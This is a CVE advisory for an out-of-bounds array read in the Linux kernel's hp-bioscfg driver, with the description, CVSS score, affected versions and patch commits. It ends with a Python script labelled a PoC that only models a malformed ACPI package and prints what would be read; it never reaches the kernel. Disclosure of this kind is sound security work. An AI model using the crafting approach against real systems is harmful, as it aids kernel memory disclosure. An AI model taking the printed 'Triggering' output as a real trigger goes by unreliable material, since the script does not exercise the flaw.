Security Vulnerability Report
CVE-2025-71101 CVSS 7.1 HIGH

CVE-2025-71101

Published: 2026-01-13 16:16:10
Last Modified: 2026-03-25 18:56:12
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

platform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing

The hp_populate_*_elements_from_package() functions in the hp-bioscfg driver contain out-of-bounds array access vulnerabilities.

These functions parse ACPI packages into internal data structures using a for loop with index variable 'elem' that iterates through enum_obj/integer_obj/order_obj/password_obj/string_obj arrays.

When processing multi-element fields like PREREQUISITES and ENUM_POSSIBLE_VALUES, these functions read multiple consecutive array elements using expressions like 'enum_obj[elem + reqs]' and 'enum_obj[elem + pos_values]' within nested loops.

The bug is that the bounds check only validated elem, but did not consider the additional offset when accessing elem + reqs or elem + pos_values.

The fix changes the bounds check to validate the actual accessed index.
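The bounds-check mistake described above, as a simplified user-space model (an added example, not the driver's code). The struct, the function names and the 16-entry buffer are constructed for illustration; only the index expressions `elem` and `elem + reqs` come from the description.

```c
#include <stddef.h>
#include <stdio.h>

/* Constructed stand-in for one ACPI package element; not the kernel's type. */
struct elem_obj { int value; };

enum bounds_check { CHECK_ELEM_ONLY, CHECK_ACCESSED_INDEX };

/*
 * Model of the nested loop: starting at index `elem`, read `size` consecutive
 * entries as obj[elem + reqs]. `count` is the number of entries the package
 * really holds. Returns -1 if the bounds check rejects the package, otherwise
 * the number of reads that landed at an index >= count.
 */
static int read_prerequisites(const struct elem_obj *obj, size_t count,
                              size_t elem, size_t size, enum bounds_check mode)
{
    int past_end = 0;

    for (size_t reqs = 0; reqs < size; reqs++) {
        size_t idx = elem + reqs;
        /* Before the fix only `elem` was validated; after it, `elem + reqs`. */
        size_t checked = (mode == CHECK_ACCESSED_INDEX) ? idx : elem;

        if (checked >= count)
            return -1;        /* package too small: reject it */
        if (idx >= count)
            past_end++;       /* check passed, yet the read is outside the package */
        (void)obj[idx].value;
    }
    return past_end;
}

/* Constructed input: 6 valid entries inside a 16-entry buffer, so the
 * demonstration never reads outside its own memory. */
static struct elem_obj backing[16];
#define PACKAGE_COUNT 6

int demo(size_t size, enum bounds_check mode)
{
    return read_prerequisites(backing, PACKAGE_COUNT, 3, size, mode);
}

int main(void)
{
    printf("size=5, elem-only check:      %d\n", demo(5, CHECK_ELEM_ONLY));
    printf("size=5, accessed-index check: %d\n", demo(5, CHECK_ACCESSED_INDEX));
    printf("size=3, accessed-index check: %d\n", demo(3, CHECK_ACCESSED_INDEX));
    return 0;
}
```

A package that claims five entries starting at index 3 passes the `elem`-only check on every iteration even though two of the reads fall past the six real entries; validating the accessed index rejects it.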

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

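cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.6.1 including, up to 6.6.120 excluding) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.7 including, up to 6.12.64 excluding) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.13 including, up to 6.18.4 excluding) - VULNERABLE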
cpe:2.3:o:linux:linux_kernel:6.6:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
Linux kernel hp-bioscfg driver (all versions prior to patch)
Specific patches:
79cab730dbaaac03b946c7f5681bd08c986e2abd
cf7ae870560b988247a4bbbe5399edd326632680
db4c26adf7117b1a4431d1197ae7109fee3230ad
e44c42c830b7ab36e3a3a86321c619f24def5206

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-71101 PoC - hp-bioscfg out-of-bounds array access
# This PoC demonstrates the vulnerability concept (requires kernel debugging environment)
import ctypes

# ACPI package element types (ACPICA object type codes)
ACPI_TYPE_INTEGER = 1
ACPI_TYPE_STRING = 2
ACPI_TYPE_BUFFER = 3
ACPI_TYPE_PACKAGE = 4


class ACPI_OBJECT(ctypes.Structure):
    _fields_ = [
        ('type', ctypes.c_int),
        ('data', ctypes.c_void_p),
    ]


class MALFORMED_ACPI_PACKAGE:
    """
    Simulates a malicious ACPI package that triggers OOB access in
    hp_populate_*_elements_from_package() functions.

    The vulnerability occurs when:
    1. elem is within bounds
    2. elem + offset (e.g., elem + reqs) exceeds array boundary
    3. The code reads enum_obj[elem + reqs] without proper bounds check
    """

    def __init__(self):
        # Craft ACPI package with ENUM_POSSIBLE_VALUES that has
        # more elements than the enum_obj array can accommodate
        self.elements = []

        # Element 0: enum type marker
        self.elements.append(ACPI_TYPE_INTEGER)  # type field
        self.elements.append(1)                  # count field

        # Element 1: PREREQUISITES - claims 5 prerequisites
        self.elements.append(ACPI_TYPE_PACKAGE)
        self.elements.append(5)  # reqs = 5

        # Element 2-6: Only 3 actual prerequisite elements
        # This creates mismatch: reqs=5 but only 3 elements provided
        self.elements.append(ACPI_TYPE_INTEGER)
        self.elements.append(1)
        self.elements.append(ACPI_TYPE_INTEGER)
        self.elements.append(2)
        self.elements.append(ACPI_TYPE_INTEGER)
        self.elements.append(3)
        # Missing 2 prerequisite elements!

        # Element 7: ENUM_POSSIBLE_VALUES starts here
        # enum_obj[elem + pos_values] will access beyond allocated array
        self.elements.append(ACPI_TYPE_PACKAGE)
        self.elements.append(10)  # pos_values = 10

        # The vulnerable code will try to read:
        # enum_obj[elem + 0] through enum_obj[elem + 9]
        # But the array was only sized for fewer elements

    def trigger_vulnerability(self):
        """
        Trigger the out-of-bounds access by calling the vulnerable
        hp_populate_enum_elements_from_package() function.

        In real scenario, this would be triggered through:
        1. ACPI table manipulation via BIOS or firmware update
        2. HP BIOS Configuration Utility
        3. Direct ACPI system table modification (requires kernel access)
        """
        print("[*] Triggering CVE-2025-71101 vulnerability...")
        print("[*] ACPI package structure:")
        print(f" - Total elements: {len(self.elements)}")
        print(" - PREREQUISITES claimed: 5, actual: 3")
        print(" - ENUM_POSSIBLE_VALUES offset: 7")
        print("[*] Vulnerable code will access enum_obj[7+0] to enum_obj[7+9]")
        # Indexes 7..16 are read, so any array shorter than 17 elements is overrun
        print("[!] Out-of-bounds read may occur if array size < 17 elements")
        print("[*] This could leak kernel memory contents")

        # Note: Actual exploitation requires:
        # - Root/privileged access to load malicious ACPI tables
        # - Or BIOS/firmware manipulation
        # - HP systems with hp-bioscfg driver loaded
        return True


def main():
    print("=" * 60)
    print("CVE-2025-71101 PoC - hp-bioscfg OOB Array Access")
    print("=" * 60)

    poc = MALFORMED_ACPI_PACKAGE()
    poc.trigger_vulnerability()

    print("\n[*] Mitigation:")
    print(" - Upgrade Linux kernel to patched version")
    print(" - Apply kernel patches from git.kernel.org:")
    print(" 79cab730dbaaac03b946c7f5681bd08c986e2abd")
    print(" cf7ae870560b988247a4bbbe5399edd326632680")
    print(" db4c26adf7117b1a4431d1197ae7109fee3230ad")
    print(" e44c42c830b7ab36e3a3a86321c619f24def5206")


if __name__ == "__main__":
    main()
```

References

Raw JSON Data
